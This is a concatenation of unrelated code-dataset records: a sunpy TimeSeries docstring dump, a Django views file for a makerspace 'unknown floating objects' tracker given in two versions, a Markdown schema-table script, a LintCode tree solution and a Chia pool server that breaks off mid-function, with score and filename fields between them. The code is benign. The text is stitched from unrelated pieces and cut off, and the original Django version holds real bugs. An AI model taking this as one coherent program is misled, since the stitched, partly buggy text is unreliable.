This module provies the `~sunpy.timeseries.TimeSeriesFactory` class. TimeSeries(*args, **kwargs) TimeSeries factory class, used to create a variety of `~sunpy.timeseries.TimeSeries` objects. Valid timeseries types are specified by registering them with the factory. Parameters ---------- source : `str`, optional A string to select the observational source of the data, currently necessary to define how files should be read for all instruments. concatenate : `bool`, optional Defaults to `False`. If set, combine any resulting list of TimeSeries objects into a single TimeSeries, using successive concatenate methods. Examples -------- >>> import sunpy.timeseries >>> import sunpy.data.sample # doctest: +REMOTE_DATA >>> my_timeseries = sunpy.timeseries.TimeSeries(sunpy.data.sample.GOES_XRS_TIMESERIES) # doctest: +REMOTE_DATA The SunPy TimeSeries factory accepts a wide variety of inputs for creating timeseries * Preloaded tuples of (data, header) pairs or (data, header, units) >>> my_timeseries = sunpy.timeseries.TimeSeries((data, header)) # doctest: +SKIP Headers and units must be either a `dict`, `~collections.OrderedDict` or `~sunpy.util.metadata.MetaDict`. * data, header pairs, or data, header units triples, not in tuples >>> my_timeseries = sunpy.timeseries.TimeSeries(data, header) # doctest: +SKIP >>> my_timeseries = sunpy.timeseries.TimeSeries(data, header, units) # doctest: +SKIP * File names for files understood by `sunpy.io` and those not >>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits') # doctest: +SKIP >>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits', source='lyra') # doctest: +SKIP * Multiple files can be combined into one TimeSeries, as long as they are the same source >>> my_timeseries = sunpy.timeseries.TimeSeries(['goesfile1.fits', 'goesfile2.fits'], ... 
concatenate=True) # doctest: +SKIP * All fits files in a directory by giving a directory >>> my_timeseries = sunpy.timeseries.TimeSeries('local_dir/sub_dir') # doctest: +SKIP * Some regex globs >>> my_timeseries = sunpy.timeseries.TimeSeries('eit_*.fits') # doctest: +SKIP * URLs >>> my_timeseries = sunpy.timeseries.TimeSeries(url) # doctest: +SKIP * Lists of any of the above >>> my_timeseries = sunpy.timeseries.TimeSeries(['file1.fits', 'file2.fits', ... 'file3.fits', 'directory1/']) # doctest: +SKIP * Any mixture of the above not in a list >>> my_timeseries = sunpy.timeseries.TimeSeries((data, header), data2, header2, ... 'file1.fits', url, 'eit_*.fits') # doctest: +SKIP Reading a file with `sunpy.io` for automatic source detection. Parameters ---------- fname : `str` The file path to parse. Returns ------- parsed : `bool` `True` if file has been read. pairs : `list` or `str` List of ``(data, header)`` pairs if ``parsed`` is `True`, ``fname`` if ``parsed`` is `False`. `False` if the file is not supported or incorrect. Validate a meta argument for use as metadata. Currently only validates by class. Validates the astropy unit-information associated with a `~sunpy.timeseries.TimeSeries`. Should be a dictionary of some form (but not `sunpy.util.metadict.MetaDict`) with only `astropy.units` for values. # It must be a dictionary # If this is not a unit then this can't be a valid units dict. # Passed all the tests Extract the data, metadata and units from an astropy table for use in constructing a `~sunpy.timeseries.TimeSeries`. Parameters ---------- t: `~astropy.table.Table` The input table. The datetime column must be the first column or the (single) primary key index. 
# Default the time index to the first column # Check if another column is defined as the index/primary_key # Check there is only one primary_key/index column # Extract, convert and remove the index column from the input table # Convert if the index is given as an astropy Time object # Extract the column values from the table # Create a dataframe with this and return Parses an `args` list for data-header pairs. `args` can contain any mixture of the following entries: * tuples of (data, header, unit) (1) * data, header not in a tuple (1) * filename, which will be read * directory, from which all files will be read * glob, from which all files will be read * url, which will be downloaded and read * lists containing any of the above. (1) header/unit are optional and in either order, but data should be the first entry in each group. Examples -------- self._parse_args(data, header, (data, header), ['file1', 'file2', 'file3'], 'file4', 'directory1', '*.fits') # Account for nested lists of items. Simply outputs a single list of # items, nested lists are expanded to element level. # For each of the arguments, handle each of the cases # Data-header pair in a tuple # and self._validate_meta(args[i+1])): # Assume a Pandas Dataframe is given # Convert the data argument into a Pandas DataFrame if needed. # We have an Astropy Table: # We have a numpy ndarray. We assume the first column is a dt index # If there are 1 or 2 more arguments: # If that next argument isn't data but is metaddata or units: # an extra increment to account for the units # if we have an astropy.io FITS header then convert # to preserve multi-line comments # an extra increment to account for the meta # Add a 3-tuple for this TimeSeries. 
# Filepath # Directory # returns a boolean telling us if it were read and either a # tuple or the original filepath for reading by a source # Glob # returns a boolean telling us if it were read and either a # tuple or the original filepath for reading by a source # Already a TimeSeries # A URL # TODO: # In the end, if there are already TimeSeries it should be put in the # same order as the input, currently they are not. Method for running the factory. Takes arbitrary arguments and keyword arguments and passes them to a sequence of pre-registered types to determine which is the correct `~sunpy.timeseries.TimeSeries` source type to build. Arguments args and kwargs are passed through to the validation function and to the constructor for the final type. For `~sunpy.timeseries.TimeSeries` types, validation function must take a data-header pair as an argument. Parameters ---------- silence_errors : `bool`, optional If set, ignore data-header pairs which cause an exception. Defaults to `False`. Notes ----- Extra keyword arguments are passed through to `sunpy.io.read_file` such as `memmap` for FITS files. # The filepaths for unreadable files # data_header_pairs is a list of HDUs as read by sunpy.io # For each set of HDus find the matching class and read the # data_header_unit_tuples by calling the _parse_hdus method # of the class. # Pairs may be x long where x is the number of HDUs in the file. # If no specific classes have been found we can read the data # if we only have one data header pair: # Loop over each registered type and check to see if WidgetType # matches the arguments. If it does, use that type # Make a MetaDict from various input types # Concatenate the timeseries into one if specified. # Merge all these timeseries into one. # Sanitize any units OrderedDict details # Only return single time series, not in a list if we only have one. 
# Call the registered validation function for each registered class # Only one suitable source class is found Checks the (instrument) source(s) that are compatible with this given file/data. Only if exactly one source is compatible will a `~sunpy.timeseries.TimeSeries` be returned. # Dealing with the fact that timeseries filetypes are less consistent # (then maps), we use a _parse_file() method embedded into each # instrument subclass. # Now return a TimeSeries from the given file. Exception to raise when input variable is not a `~sunpy.timeseries.TimeSeries` instance and does not point to a valid TimeSeries input file. Exception to raise when an invalid type of timeseries is requested with `~sunpy.timeseries.TimeSeries`. Exception to raise when input does not point to any valid `~sunpy.timeseries.TimeSeries` or files.
| 2.375304
| 2
|
ufo/views.py
|
leonrenkema/makerspaceleiden-crm
| 0
|
6628547
|
from django.shortcuts import render
from django.contrib.sites.shortcuts import get_current_site
from django.contrib.admin.sites import AdminSite
from django.template import loader
from django.http import HttpResponse
from django.conf import settings
from django.shortcuts import redirect
from django.views.generic import ListView, CreateView, UpdateView
from django.contrib.auth.decorators import login_required
from django import forms
from django.contrib.auth import login, authenticate
from django.shortcuts import render, redirect
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.shortcuts import render
from django.views.decorators.csrf import csrf_protect
from django.db.models import Q
from simple_history.admin import SimpleHistoryAdmin
from django.template.loader import render_to_string, get_template
from django.core.mail import EmailMessage
from django.conf import settings
from django.contrib.admin.sites import AdminSite
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail import EmailMultiAlternatives
from django.urls import reverse
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from ufo.utils import emailUfoInfo
import datetime
import uuid
import zipfile
import os
import re
import logging
logger = logging.getLogger(__name__)
from .models import Ufo
from .admin import UfoAdmin
from .forms import UfoForm, NewUfoForm, UfoZipUploadForm
from members.models import User
# Note - we do this here; rather than in the model its save() - as this
# lets admins change things through the database interface silently.
# Which can help when sheparding the community.
#
def alertOwnersToChange(items, userThatMadeTheChange=None, toinform=[]):
    """
    Email the people affected by a change to one or more UFO items.

    Parameters
    ----------
    items : Ufo or iterable of Ufo
        The changed item(s), passed through to ``emailUfoInfo``.
    userThatMadeTheChange : User, optional
        Included in the email context and added to the recipients.
    toinform : list of str, optional
        Extra recipient email addresses.
    """
    context = {
        "user": userThatMadeTheChange,
        "base": settings.BASE,
    }
    # BUG FIX: copy instead of mutating the (shared, mutable-default)
    # ``toinform`` argument — the old ``toinform.append(...)`` accumulated
    # addresses across calls and mutated caller-owned lists.
    recipients = list(toinform)
    if userThatMadeTheChange:
        recipients.append(userThatMadeTheChange.email)
    if settings.ALSO_INFORM_EMAIL_ADDRESSES:
        recipients.extend(settings.ALSO_INFORM_EMAIL_ADDRESSES)
    # BUG FIX: the computed recipients and context were previously discarded
    # (literal ``toinform=[]`` / ``context={}`` were passed), so nobody got
    # the notification and the template rendered without context.
    return emailUfoInfo(items, "email_notification", toinform=recipients, context=context)
def ufo_redirect(pk=None):
    """Redirect to the UFO index page, optionally anchored at item ``pk``."""
    target = reverse("ufo")
    if pk:
        # Jump straight to the item via a fragment anchor.
        target = "{}#{}".format(target, pk)
    return redirect(target)
def index(request, days=30):
    """List UFOs; with days > 0, show only recently changed or still-unknown items."""
    items = Ufo.objects.all()
    if days > 0:
        # Keep anything touched within the window, plus everything still unidentified.
        cutoff = datetime.date.today() - datetime.timedelta(days=days)
        items = items.filter(Q(lastChange__gte=cutoff) | Q(state="UNK"))
    return render(
        request,
        "ufo/index.html",
        {
            "title": "Uknown Floating Objects",
            "lst": items,
            "days": days,
            "has_permission": request.user.is_authenticated,
        },
    )
@login_required
def create(request):
    """Self-service creation of a new UFO entry.

    The state is forced to UNK regardless of form input; on success the
    item's owner (if any) and the creator are emailed and the user is
    redirected to the new item on the index page.
    """
    form = NewUfoForm(request.POST or None, request.FILES, initial={"state": "UNK"})
    if form.is_valid():
        try:
            item = form.save(commit=False)
            item.state = "UNK"
            if not item.description:
                item.description = "Added by {}".format(request.user)
            item.changeReason = "Created by {} through the self-service portal.".format(
                request.user
            )
            item.save()
            # Consistency fix: alertOwnersToChange is called with a *list* of
            # items everywhere else (see modify()/upload_zip()); also tolerate
            # an item without an owner instead of crashing on .email.
            toinform = [item.owner.email] if item.owner else []
            alertOwnersToChange([item], request.user, toinform)
            return ufo_redirect(item.id)
        except Exception as e:
            logger.error(
                "Unexpected error during initial save of new ufo: {}".format(e)
            )
            return HttpResponse(
                "Something went wrong ??", status=500, content_type="text/plain"
            )
    context = {
        "title": "Add an Uknown Floating Objects",
        "form": form,
        "action": "Add",
        "has_permission": request.user.is_authenticated,
    }
    return render(request, "ufo/crud.html", context)
def show(request, pk):
    """Read-only detail page for a single UFO; plain-text 404 if it doesn't exist."""
    try:
        item = Ufo.objects.get(pk=pk)
    except ObjectDoesNotExist:
        return HttpResponse("UFO not found", status=404, content_type="text/plain")
    return render(
        request,
        "ufo/view.html",
        {
            "title": "Uknown Floating Objects",
            "item": item,
            "has_permission": request.user.is_authenticated,
        },
    )
@login_required
def modify(request, pk):
    """Self-service edit of an existing UFO.

    On a successful POST, both the previous owner and the (possibly new)
    owner are notified, then the user is redirected back to the index.
    GET renders the edit form.
    """
    try:
        oitem = Ufo.objects.get(pk=pk)
    except ObjectDoesNotExist:
        return HttpResponse("UFO not found", status=404, content_type="text/plain")
    # Capture the pre-change owner so they hear about the edit even if
    # ownership is reassigned by the form.
    toinform = []
    if oitem.owner:
        toinform.append(oitem.owner.email)
    context = {
        "title": "Update an Uknown Floating Objects",
        "action": "Update",
        "item": oitem,
        "has_permission": request.user.is_authenticated,
    }
    if request.POST:
        form = UfoForm(request.POST or None, request.FILES, instance=oitem)
        if form.is_valid():
            try:
                item = form.save(commit=False)
                item.changeReason = "Changed by {} via self service portal".format(
                    request.user
                )
                item.save()
            except Exception as e:
                # Bug fix: a failed save used to be logged and then execution
                # fell through, alerting owners and redirecting as if the
                # update had succeeded.
                logger.error("Unexpected error during update of ufo: {}".format(e))
                return HttpResponse(
                    "Something went wrong ??", status=500, content_type="text/plain"
                )
            if item.owner:
                toinform.append(item.owner.email)
            alertOwnersToChange([item], request.user, toinform)
            return ufo_redirect(pk)
    form = UfoForm(instance=oitem)
    context["form"] = form
    return render(request, "ufo/crud.html", context)
@login_required
def mine(request, pk):
    """Record a "this is mine" claim on a UFO via the self-service portal.

    Notifies the current owner (if the claimer isn't already the owner)
    and saves the item with an audit change reason.
    """
    try:
        item = Ufo.objects.get(pk=pk)
    except ObjectDoesNotExist:
        return HttpResponse("UFO not found", status=404, content_type="text/plain")
    item.changeReason = "claimed as 'mine' by {} via self service portal".format(
        request.user
    )
    if item.owner != request.user:
        # Bug fix: an unowned item (owner is None) used to crash here on
        # item.owner.email.
        toinform = [item.owner.email] if item.owner else []
        alertOwnersToChange([item], request.user, toinform)
    # NOTE(review): item.owner is never reassigned to request.user here —
    # confirm whether the model's save()/signals perform the actual claim.
    item.save()
    return ufo_redirect(pk)
@login_required
# Limit this to admins ?
def delete(request, pk):
    """Two-step delete of a UFO.

    GET renders a read-only confirmation form; POST saves the change
    reason (so it lands in the history) and then deletes the item.
    """
    try:
        item = Ufo.objects.get(pk=pk)
    except ObjectDoesNotExist:
        return HttpResponse("UFO not found", status=404, content_type="text/plain")
    form = UfoForm(request.POST or None, instance=item)
    # The form is only shown for confirmation, so every field is read-only.
    for name in form.fields:
        form.fields[name].disabled = True
    if not request.POST:
        return render(
            request,
            "ufo/crud.html",
            {
                "title": "Confirm delete of this UFO",
                "label": "Confirm delete of this UFO",
                "action": "Delete",
                "is_logged_in": request.user.is_authenticated,
                "user": request.user,
                "form": form,
                "item": item,
                "delete": True,
            },
        )
    if not form.is_valid():
        return HttpResponse("Eh - confused ?!", status=403, content_type="text/plain")
    try:
        item.changeReason = "Deleted via the self-service interface by {0}".format(
            request.user
        )
        # Save first so the change reason is recorded, then delete.
        item.save()
        item.delete()
    except Exception as e:
        logger.error("Unexpected error during delete of item: {0}".format(e))
        return HttpResponse("Box fail", status=400, content_type="text/plain")
    return ufo_redirect()
@login_required
def upload_zip(request):
    """Bulk-create UFO entries from an uploaded zip of images.

    Each plausible image in the archive (by extension and the size limits
    from settings) becomes a new Ufo in state UNK; everything else is
    reported back to the uploader in the "skipped" list.
    """
    form = UfoZipUploadForm(request.POST or None, request.FILES)
    if request.method == "POST":
        if form.is_valid() and "zipfile" in request.FILES:
            if request.FILES["zipfile"].size > settings.MAX_ZIPFILE:
                return HttpResponse(
                    "Upload too large", status=500, content_type="text/plain"
                )
            # Spool the upload into a uniquely named temp file so that
            # zipfile can seek in it.
            tmpZip = settings.MEDIA_ROOT + "/ufozip-" + str(uuid.uuid4())
            with open(tmpZip, "wb+") as dst:
                for c in request.FILES["zipfile"].chunks():
                    dst.write(c)
            skipped = []
            lst = []
            with zipfile.ZipFile(tmpZip, "r") as z:
                for zi in z.infolist():
                    # Bug fix: f must be assigned before the is_dir() branch,
                    # which previously referenced it while still undefined
                    # (NameError on the first directory entry).
                    f = zi.filename
                    if zi.is_dir():
                        skipped.append("{0}: skipped, directory".format(f))
                        continue
                    # Hidden files: dot at the start or after any slash.
                    if re.match(r"\..*", f) or re.match(r".*/\.", f):
                        skipped.append("{0}: skipped, hidden file".format(f))
                        continue
                    if zi.file_size < settings.MIN_IMAGE_SIZE:
                        skipped.append("{0}: skipped, too small".format(f))
                        continue
                    if zi.file_size > settings.MAX_IMAGE_SIZE:
                        skipped.append("{0}: skipped, too large".format(f))
                        continue
                    if re.match(r".*\.(jpg|jpeg)$", f, re.IGNORECASE):
                        extension = "jpg"
                    elif re.match(r".*\.(png)$", f, re.IGNORECASE):
                        extension = "png"
                    else:
                        skipped.append(
                            "{0}: skipped, does not have an image extension such as .jp(e)g or .png.".format(
                                f
                            )
                        )
                        continue
                    ufo = Ufo(description="Auto upload", state="UNK")
                    try:
                        with z.open(f) as fh:
                            fp = str(uuid.uuid4()) + "." + extension
                            ufo.image.save(fp, fh)
                    except Exception as e:
                        logger.error("Error during zip extract: {}".format(e))
                        skipped.append(
                            "{0}: skipped, could not be extracted.".format(f)
                        )
                        continue
                    # Bug fix: this loop used to reuse and clobber the
                    # filename variable f.
                    for field in ["description", "deadline", "dispose_by_date"]:
                        if form.cleaned_data[field]:
                            setattr(ufo, field, form.cleaned_data[field])
                    ufo.changeReason = "Part of a bulk upload by {}".format(
                        request.user
                    )
                    ufo.save()
                    lst.append(ufo)
            try:
                os.remove(tmpZip)
            except OSError as e:
                # Bug fix: the old bare `except:` logged an undefined
                # variable e, raising a NameError inside the handler.
                logger.error("Error during cleanup of {}: {}".format(tmpZip, e))
            if lst:
                alertOwnersToChange(lst, request.user, [request.user.email])
            return render(
                request,
                "ufo/upload.html",
                {
                    "has_permission": request.user.is_authenticated,
                    "action": "Done",
                    "lst": lst,
                    "skipped": skipped,
                },
            )
    return render(
        request,
        "ufo/upload.html",
        {
            "form": form,
            "action": "Upload",
            "has_permission": request.user.is_authenticated,
        },
    )
|
from django.shortcuts import render
from django.contrib.sites.shortcuts import get_current_site
from django.contrib.admin.sites import AdminSite
from django.template import loader
from django.http import HttpResponse
from django.conf import settings
from django.shortcuts import redirect
from django.views.generic import ListView, CreateView, UpdateView
from django.contrib.auth.decorators import login_required
from django import forms
from django.contrib.auth import login, authenticate
from django.shortcuts import render, redirect
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.shortcuts import render
from django.views.decorators.csrf import csrf_protect
from django.db.models import Q
from simple_history.admin import SimpleHistoryAdmin
from django.template.loader import render_to_string, get_template
from django.core.mail import EmailMessage
from django.conf import settings
from django.contrib.admin.sites import AdminSite
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail import EmailMultiAlternatives
from django.urls import reverse
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from ufo.utils import emailUfoInfo
import datetime
import uuid
import zipfile
import os
import re
import logging
logger = logging.getLogger(__name__)
from .models import Ufo
from .admin import UfoAdmin
from .forms import UfoForm, NewUfoForm, UfoZipUploadForm
from members.models import User
# Note - we do this here; rather than in the model its save() - as this
# lets admins change things through the database interface silently.
# Which can help when sheparding the community.
#
def alertOwnersToChange(items, userThatMadeTheChange=None, toinform=[]):
context = {
"user": userThatMadeTheChange,
"base": settings.BASE,
}
if userThatMadeTheChange:
toinform.append(userThatMadeTheChange.email)
if settings.ALSO_INFORM_EMAIL_ADDRESSES:
toinform.extend(settings.ALSO_INFORM_EMAIL_ADDRESSES)
return emailUfoInfo(items, "email_notification", toinform=[], context={})
def ufo_redirect(pk=None):
url = reverse("ufo")
if pk:
url = "{}#{}".format(url, pk)
return redirect(url)
def index(request, days=30):
lst = Ufo.objects.all()
if days > 0:
tooOld = datetime.date.today() - datetime.timedelta(days=days)
lst = lst.filter(Q(lastChange__gte=tooOld) | Q(state="UNK"))
context = {
"title": "Uknown Floating Objects",
"lst": lst,
"days": days,
"has_permission": request.user.is_authenticated,
}
return render(request, "ufo/index.html", context)
@login_required
def create(request):
form = NewUfoForm(request.POST or None, request.FILES, initial={"state": "UNK"})
if form.is_valid():
try:
item = form.save(commit=False)
item.state = "UNK"
if not item.description:
item.description = "Added by {}".format(request.user)
item.changeReason = "Created by {} through the self-service portal.".format(
request.user
)
item.save()
alertOwnersToChange(item, request.user, [item.owner.email])
return ufo_redirect(item.id)
except Exception as e:
logger.error(
"Unexpected error during initial save of new ufo: {}".format(e)
)
return HttpResponse(
"Something went wrong ??", status=500, content_type="text/plain"
)
context = {
"title": "Add an Uknown Floating Objects",
"form": form,
"action": "Add",
"has_permission": request.user.is_authenticated,
}
return render(request, "ufo/crud.html", context)
def show(request, pk):
try:
item = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
context = {
"title": "Uknown Floating Objects",
"item": item,
"has_permission": request.user.is_authenticated,
}
return render(request, "ufo/view.html", context)
@login_required
def modify(request, pk):
try:
oitem = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
toinform = []
if oitem.owner:
toinform.append(oitem.owner.email)
context = {
"title": "Update an Uknown Floating Objects",
"action": "Update",
"item": oitem,
"has_permission": request.user.is_authenticated,
}
if request.POST:
form = UfoForm(request.POST or None, request.FILES, instance=oitem)
if form.is_valid() and request.POST:
try:
item = form.save(commit=False)
item.changeReason = "Changed by {} via self service portal".format(
request.user
)
item.save()
except Exception as e:
logger.error("Unexpected error during update of ufo: {}".format(e))
if item.owner:
toinform.append(item.owner.email)
alertOwnersToChange([item], request.user, toinform)
context["item"] = item
return ufo_redirect(pk)
form = UfoForm(instance=oitem)
context["form"] = form
return render(request, "ufo/crud.html", context)
@login_required
def mine(request, pk):
try:
item = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
item.changeReason = "claimed as 'mine' by {} via self service portal".format(
request.user
)
if item.owner != request.user:
alertOwnersToChange([item], request.user, [item.owner.email])
item.save()
return ufo_redirect(pk)
@login_required
# Limit this to admins ?
def delete(request, pk):
try:
item = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
form = UfoForm(request.POST or None, instance=item)
for f in form.fields:
form.fields[f].disabled = True
if not request.POST:
context = {
"title": "Confirm delete of this UFO",
"label": "Confirm delete of this UFO",
"action": "Delete",
"is_logged_in": request.user.is_authenticated,
"user": request.user,
"form": form,
"item": item,
"delete": True,
}
return render(request, "ufo/crud.html", context)
if not form.is_valid():
return HttpResponse("Eh - confused ?!", status=403, content_type="text/plain")
try:
item.changeReason = "Deleted via the self-service interface by {0}".format(
request.user
)
item.save()
item.delete()
except Exception as e:
logger.error("Unexpected error during delete of item: {0}".format(e))
return HttpResponse("Box fail", status=400, content_type="text/plain")
return ufo_redirect()
@login_required
def upload_zip(request):
form = UfoZipUploadForm(request.POST or None, request.FILES)
if request.method == "POST":
if form.is_valid() and "zipfile" in request.FILES:
if request.FILES["zipfile"].size > settings.MAX_ZIPFILE:
return HttpResponse(
"Upload too large", status=500, content_type="text/plain"
)
tmpZip = settings.MEDIA_ROOT + "/ufozip-" + str(uuid.uuid4())
with open(tmpZip, "wb+") as dst:
for c in request.FILES["zipfile"].chunks():
dst.write(c)
skipped = []
lst = []
with zipfile.ZipFile(tmpZip, "r") as z:
for zi in z.infolist():
if zi.is_dir():
skipped.append("{0}: skipped, directory".format(f))
continue
f = zi.filename
if re.match("\..*", f):
skipped.append("{0}: skipped, hidden file".format(f))
continue
if re.match(".*/\.", f):
skipped.append("{0}: skipped, hidden file".format(f))
continue
if zi.file_size < settings.MIN_IMAGE_SIZE:
skipped.append("{0}: skipped, too small".format(f))
continue
if zi.file_size > settings.MAX_IMAGE_SIZE:
skipped.append("{0}: skipped, too large".format(f))
continue
extension = "raw"
if re.match(".*\.(jpg|jpeg)$", f, re.IGNORECASE):
extension = "jpg"
elif re.match(".*\.(png)$", f, re.IGNORECASE):
extension = "png"
else:
skipped.append(
"{0}: skipped, does not have an image extension such as .jp(e)g or .png.".format(
f
)
)
continue
ufo = Ufo(description="Auto upload", state="UNK")
try:
with z.open(f) as fh:
fp = str(uuid.uuid4()) + "." + extension
ufo.image.save(fp, fh)
except Exception as e:
logger.error("Error during zip extract: {}".format(e))
skipped.append(
"{0}: skipped, could not be extracted.".format(f)
)
continue
for f in ["description", "deadline", "dispose_by_date"]:
if form.cleaned_data[f]:
setattr(ufo, f, form.cleaned_data[f])
ufo.changeReason = "Part of a bulk upload by {}".format(
request.user
)
ufo.save()
lst.append(ufo)
try:
os.remove(tmpZip)
except:
logger.error("Error during cleanup of {}: {}".format(tmpZip, e))
if lst:
alertOwnersToChange(lst, request.user, [request.user.email])
return render(
request,
"ufo/upload.html",
{
"has_permission": request.user.is_authenticated,
"action": "Done",
"lst": lst,
"skipped": skipped,
},
)
return render(
request,
"ufo/upload.html",
{
"form": form,
"action": "Upload",
"has_permission": request.user.is_authenticated,
},
)
|
en
| 0.885799
|
# Note - we do this here; rather than in the model its save() - as this # lets admins change things through the database interface silently. # Which can help when sheparding the community. # #{}".format(url, pk) # Limit this to admins ?
| 1.694074
| 2
|
scripts/schema.py
|
OpenPDI/pdi
| 4
|
6628548
|
# Generate a Markdown (pipe-format) table documenting the use-of-force (uof)
# schema: one row per schema field, with an example value and the list of
# agencies whose metadata declares that column.
import json
import pathlib
import tabulate
# Directory holding schema.json plus one JSON metadata file per agency.
data = pathlib.Path(__file__).parents[1] / "openpdi" / "meta" / "uof"
if __name__ == "__main__":
    schema_path = data.joinpath("schema.json")
    with open(schema_path, "r") as s:
        columns = json.load(s)
    rows = []
    # One table row per schema field, sorted by label for stable output.
    for col in sorted(columns["fields"], key = lambda i: i["label"]):
        agencies = []
        # Scan every agency metadata file to see which agencies report
        # this column; the agency id is the second-to-last URL component.
        for d in data.glob("*/*.json"):
            with open(d, "r") as a:
                for agency in json.load(a):
                    if col["label"] in agency["columns"]:
                        agencies.append(agency["url"].split("/")[-2])
        link = "[`{0}`](https://github.com/OpenPDI/data/releases/tag/{0})"
        rows.append([
            "`{0}`".format(col["label"]),
            col["description"],
            # Replace "|" so example values don't break the pipe table.
            "`{0}`".format(col["example"].replace("|", "/")),
            ", ".join([link.format(f) for f in set(agencies)])
        ])
    table = tabulate.tabulate(
        rows,
        [
            "Column name",
            "Column description",
            "Example value",
            "Reporting Agencies"
        ],
        tablefmt="pipe",
    )
    print(table)
|
import json
import pathlib
import tabulate
data = pathlib.Path(__file__).parents[1] / "openpdi" / "meta" / "uof"
if __name__ == "__main__":
schema_path = data.joinpath("schema.json")
with open(schema_path, "r") as s:
columns = json.load(s)
rows = []
for col in sorted(columns["fields"], key = lambda i: i["label"]):
agencies = []
for d in data.glob("*/*.json"):
with open(d, "r") as a:
for agency in json.load(a):
if col["label"] in agency["columns"]:
agencies.append(agency["url"].split("/")[-2])
link = "[`{0}`](https://github.com/OpenPDI/data/releases/tag/{0})"
rows.append([
"`{0}`".format(col["label"]),
col["description"],
"`{0}`".format(col["example"].replace("|", "/")),
", ".join([link.format(f) for f in set(agencies)])
])
table = tabulate.tabulate(
rows,
[
"Column name",
"Column description",
"Example value",
"Reporting Agencies"
],
tablefmt="pipe",
)
print(table)
|
none
| 1
| 2.66662
| 3
|
|
lintcode/649.py
|
jianershi/algorithm
| 1
|
6628549
|
<filename>lintcode/649.py
"""
649. Binary Tree Upside Down
https://www.lintcode.com/problem/binary-tree-upside-down/description
"""
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
    """Turn a left-leaning binary tree upside down.

    At every level the original left child becomes the new parent; the old
    parent becomes its right child and the old right child its left child.
    """

    def upsideDownBinaryTree(self, root):
        """Return the root of the upside-down tree (None for an empty tree)."""
        new_root, _ = self.flip(root)
        return new_root

    def flip(self, root):
        """Recursively flip a subtree.

        Returns (new_root, new_rightmost_node) so the caller can attach the
        next level onto the rightmost node of the flipped left spine.
        """
        # Empty tree or leaf: nothing to rearrange.
        if root is None or (root.left is None and root.right is None):
            return root, root
        new_root, leaf = self.flip(root.left)
        # The old root hangs off the flipped left spine: its right child
        # moves to the left slot, the root itself to the right slot.
        leaf.left = root.right
        leaf.right = root
        root.left = root.right = None
        return new_root, root
|
<filename>lintcode/649.py
"""
649. Binary Tree Upside Down
https://www.lintcode.com/problem/binary-tree-upside-down/description
"""
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: the root of binary tree
@return: new root
"""
def upsideDownBinaryTree(self, root):
# write your code here
root, _ = self.flip(root)
return root
def flip(self, root):
if not root: #处理原始数据传进来就是空的情况
return root, root
if not root.left and not root.right:
return root, root
new_root, right_leaf = self.flip(root.left)
right_leaf.left = root.right
right_leaf.right = root
root.right = None
root.left = None
return new_root, root
|
en
| 0.575345
|
649. Binary Tree Upside Down https://www.lintcode.com/problem/binary-tree-upside-down/description Definition of TreeNode: class TreeNode: def __init__(self, val): self.val = val self.left, self.right = None, None @param root: the root of binary tree @return: new root # write your code here #处理原始数据传进来就是空的情况
| 3.419286
| 3
|
pool/pool_server.py
|
setar/pool-reference
| 1
|
6628550
|
<gh_stars>1-10
import asyncio
import logging
import time
import traceback
from typing import Dict, Callable, Optional
import aiohttp
from blspy import AugSchemeMPL, PrivateKey
from aiohttp import web
from chia.protocols.pool_protocol import SubmitPartial, PoolInfo
from chia.util.hash import std_hash
from chia.consensus.default_constants import DEFAULT_CONSTANTS
from chia.consensus.constants import ConsensusConstants
from chia.util.json_util import obj_to_response
from chia.util.ints import uint64, uint32
from chia.util.default_root import DEFAULT_ROOT_PATH
from chia.util.config import load_config
from error_codes import PoolErr
from store import FarmerRecord
from pool import Pool
def allow_cors(response: web.Response) -> web.Response:
    """Stamp a wildcard CORS header on *response* and return it unchanged otherwise."""
    response.headers["Access-Control-Allow-Origin"] = "*"
    return response
class PoolServer:
    """aiohttp front-end for the reference pool.

    Wraps a Pool instance and exposes its info / partial-submission
    endpoints as JSON-over-HTTP handlers with CORS headers.
    """

    def __init__(self, private_key: PrivateKey, config: Dict, constants: ConsensusConstants):
        self.log = logging.getLogger(__name__)
        self.pool = Pool(private_key, config, constants)

    async def start(self):
        await self.pool.start()

    async def stop(self):
        await self.pool.stop()

    def wrap_http_handler(self, f) -> Callable:
        """Wrap an async handler: convert unhandled exceptions into a JSON
        error payload and add CORS headers to every response."""

        async def inner(request) -> aiohttp.web.Response:
            try:
                res_object = await f(request)
                if res_object is None:
                    # Bug fix: a bare dict used to be handed to allow_cors(),
                    # which expects a web.Response; JSON-encode it first.
                    res_object = obj_to_response({})
            except Exception as e:
                tb = traceback.format_exc()
                self.log.warning(f"Error while handling message: {tb}")
                if len(e.args) > 0:
                    res_object = {"error_code": PoolErr.SERVER_EXCEPTION.value, "error_message": f"{e.args[0]}"}
                else:
                    res_object = {"error_code": PoolErr.SERVER_EXCEPTION.value, "error_message": f"{e}"}
                return allow_cors(obj_to_response(res_object))
            return allow_cors(res_object)

        return inner

    async def index(self, _) -> web.Response:
        """Plain-text landing page."""
        return web.Response(text="Chia reference pool")

    async def get_pool_info(self, _) -> web.Response:
        """Static pool metadata served at /pool_info."""
        res: PoolInfo = PoolInfo(
            "The Reference Pool",
            "https://www.chia.net/img/chia_logo.svg",
            uint64(self.pool.min_difficulty),
            uint32(self.pool.relative_lock_height),
            "1.0.0",
            str(self.pool.pool_fee),
